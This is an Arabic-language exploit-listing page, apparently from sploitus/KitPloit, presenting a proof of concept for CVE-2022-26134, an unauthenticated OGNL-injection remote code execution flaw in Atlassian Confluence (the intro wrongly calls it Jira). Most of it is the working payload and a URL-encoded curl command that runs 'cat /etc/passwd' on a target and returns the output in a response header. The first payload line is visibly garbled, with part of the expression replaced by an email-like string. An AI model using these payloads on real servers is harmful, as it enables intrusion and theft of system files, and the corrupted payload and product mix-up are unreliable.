## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IVERESK-CVE-2022-26134
# CVE-2022-26134 بواسطة 1vere$k
مجرد إثبات مفهوم (PoC) بسيط لاستغلال أطلاسيان جيرا. يوفر تنفيذ الأكواد لمستخدم غير مصرح له على الخادم.
**CVE-2022-26134 - ثغرة حقن OGNL.**
سكربت إثبات مفهوم يستغل ثغرة تنفيذ الأكواد عن بُعد التي تؤثر على أطلاسيان كونفلونس 7.18 والمنتجات الأقدم. تسمح ثغرة حقن OGNL لمستخدم غير مصادق بتنفيذ أكواد عشوائية على خادم كونفلونس أو مثيل مركز البيانات.
## الحمولة
root@kitploit:~
${(#some-email@example.com@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
**مثال مع أمر CURL:**
root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
بعد ذلك، ستنعكس نتيجة الأمر في المعامل `X-Cmd-Response` في ترويسة الاستجابة.